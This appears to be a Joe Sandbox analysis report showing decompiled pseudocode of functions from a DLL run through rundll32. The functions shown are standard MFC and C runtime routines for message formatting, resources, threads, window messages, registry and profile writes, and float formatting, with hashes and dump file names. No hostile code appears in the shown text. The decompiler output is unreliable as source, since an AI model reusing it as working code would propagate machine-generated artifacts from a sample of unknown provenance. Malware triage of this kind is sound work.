Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction ID: c51f58ba7030090f65d8388f2f6216d6b95cef8c4540db251b535ec9dede0d79
Opcode Fuzzy Hash: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction Fuzzy Hash: 2E21F375500A019FCB55DF34D881B5A73E4FF05298B22842AE869DF266DF30ECC1CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10009D34, Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E10009D34(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E10017BC1(E10027DA5, __ebx, __edi, __esi);
				_t35 = E10009B91(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E10009CDE(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E10017C83( &_a4, 0x1002e16c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10009C0D(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

APIs

__EH_prolog3.LIBCMT ref: 10009D3B

Part of subcall function 10009B91: _malloc.LIBCMT ref: 10009BAB

__CxxThrowException@8.LIBCMT ref: 10009D71
FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,1002E16C,00000004,1000105C,8007000E), ref: 10009D9A

Part of subcall function 10009C0D: _wctomb_s.LIBCMT ref: 10009C1D

LocalFree.KERNEL32(?), ref: 10009DC3

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction ID: 2087144037a306e6c8b96e697859ee983d4da7c50e84c085b7e4f49f0a09e647
Opcode Fuzzy Hash: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction Fuzzy Hash: 1E1170B1644249AFEB00DFA4DC81DAE3BA9FB04390F21452AF629CA1D1D731D9508B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C887, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000C887(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000D5EC(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000C8AD
LoadResource.KERNEL32(?,00000000), ref: 1000C8B5
LockResource.KERNEL32(00000000), ref: 1000C8C7
FreeResource.KERNEL32(00000000), ref: 1000C911

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction ID: fb1a28c5f31200e3abd4209bdb6f3add133a5505808a0a6cde1b54a47ab738f1
Opcode Fuzzy Hash: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
Instruction Fuzzy Hash: 46118F3150076AEFE710DF95C889AAAB3F5FF003D5F218029E84252594D770ED50D760

Uniqueness

Uniqueness Score: -1.00%

Function 1000ADB5, Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E1000ADB5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E10017BC1(E10027E86, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E1000B862(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x10029f54;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E1001817A( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000D5EC(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E1000A0DB(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E1000AA21(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E10017C60(_t51);
			}

APIs

__EH_prolog3.LIBCMT ref: 1000ADBC

Part of subcall function 1000B862: __EH_prolog3.LIBCMT ref: 1000B869

__strdup.LIBCMT ref: 1000ADDE
GetCurrentThread.KERNEL32 ref: 1000AE0B
GetCurrentThreadId.KERNEL32 ref: 1000AE14

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction ID: f8307bcc4145d2f3034cc24c4785684ef343d47fe4738e0b5029f7ba663f9659
Opcode Fuzzy Hash: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
Instruction Fuzzy Hash: 88217EB4800B50CFE721DF6A858564AFBF8FFA4680F10891FD59A87A25CBB0A581CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1001170E, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E1001170E(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E10010DEC(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1001044A(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10057298;
					E10017C83( &_v20, 0x1002e2fc);
					asm("int3");
					_push(4);
					E10017BC1(E10027DEC, 0, SendMessageA, _t33);
					_t29 = E10013965(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000CF71(_t29);
					}
					return E10017C60(_t24);
				}
			}

APIs

SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10011738
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 10011763

Part of subcall function 1001044A: GetTopWindow.USER32(00000000), ref: 10010458

GetCapture.USER32 ref: 10011775
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 10011784

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$CaptureWindow
String ID:
API String ID: 729421689-0
Opcode ID: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction ID: c1fa24ad5068faa30316ff7830c17e6e1fa791912a80157e4ea929c0746033bf
Opcode Fuzzy Hash: 80fe9e985e59ca35730d0e4f98e874e27816f3184ada4d3ba37fa42bed1d0644
Instruction Fuzzy Hash: EF012CB5350219BFF621AB608CC9FBA36ADEB487C4F010539F685AA1E2C6A19C415660

Uniqueness

Uniqueness Score: -1.00%

Function 10013F17, Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10013F17(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10057a08; // 0x4959db98
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10016DF0( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10013ED1(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E100167D5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10013F50
RegCloseKey.ADVAPI32(00000000), ref: 10013F59
_swprintf.LIBCMT ref: 10013F76
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10013F87

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction ID: 30a1eb16c1be1d822a6ca59f9e75d62d608c78195c8382286e316af6553577e2
Opcode Fuzzy Hash: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction Fuzzy Hash: 25018076900219BBDB00DF648C85FAF77BCEF48754F104469FA01AB181DA74E94597A4

Uniqueness

Uniqueness Score: -1.00%

Function 1000B244, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000B244(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E1000A0DB(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000FB5C(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E10012913( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

APIs

EnableMenuItem.USER32 ref: 1000B27C

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetFocus.USER32 ref: 1000B293
GetParent.USER32(?), ref: 1000B2A1
SendMessageA.USER32(?,00000028,00000000,00000000), ref: 1000B2B4

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction ID: 6f1bf2e13571d4607552996c72993327e3919edcc1f96bcd7a145644f4ad6856
Opcode Fuzzy Hash: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction Fuzzy Hash: FB115B71500A11AFE720DF64CCC9D1EBBF6FF893A5B118A2DF186869A8C731AC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001044A, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1001044A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000FB83(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1001016F(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1001044A(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(00000000), ref: 10010458
GetTopWindow.USER32(00000000), ref: 10010497
GetWindow.USER32(00000000,00000002), ref: 100104B5

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction ID: cb0d0bbe13ee34529c330f041d0b53c98759dff42d13bab1c22f515cd31b8fc3
Opcode Fuzzy Hash: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction Fuzzy Hash: CD01257620061ABBDF12DF908C44E9F3A6AEF08390F018014FE8458060C7B6D9A2EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 100223DD, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100223DD(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E10021CDA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E10021DC6(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E100222E5(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002222C(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 10022401

Part of subcall function 1002222C: __fltout2.LIBCMT ref: 10022256

__cftog_l.LIBCMT ref: 10022427
__cftoe_l.LIBCMT ref: 10022459

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 8dbc0b72f00ea763734ae0c8b1a7260823f108f727578f4f2c9ad294c4834352
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 4201287A40014ABBCF12AEC4EC41CEE3F66FB18294B958515FE1858531D236D9B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000FE47, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000FE47(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000FE47(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000FB5C(_t13, _t14, _t18);
						}
						_t10 = E1000FB83(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000FE47(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

APIs

GetDlgItem.USER32 ref: 1000FE52
GetTopWindow.USER32(00000000), ref: 1000FE65

Part of subcall function 1000FE47: GetWindow.USER32(00000000,00000002), ref: 1000FEAC

GetTopWindow.USER32(?), ref: 1000FE95

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction ID: 3243c1bb31c4da8a8ed3b9d60ce207d24ba739ee5e1db1414c8eeda74806f304
Opcode Fuzzy Hash: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction Fuzzy Hash: 07018F374016AAB7EB229F60CC00AAF3A98EF447D0F018018FD049153AD731DA12BAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001D6BC, Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E1001D6BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1002fae0);
				E1001984C(__ebx, __edi, __esi);
				_t31 = E1001BF79(__edx, __edi, _t35);
				_t15 =  *0x1005826c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1001A549(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
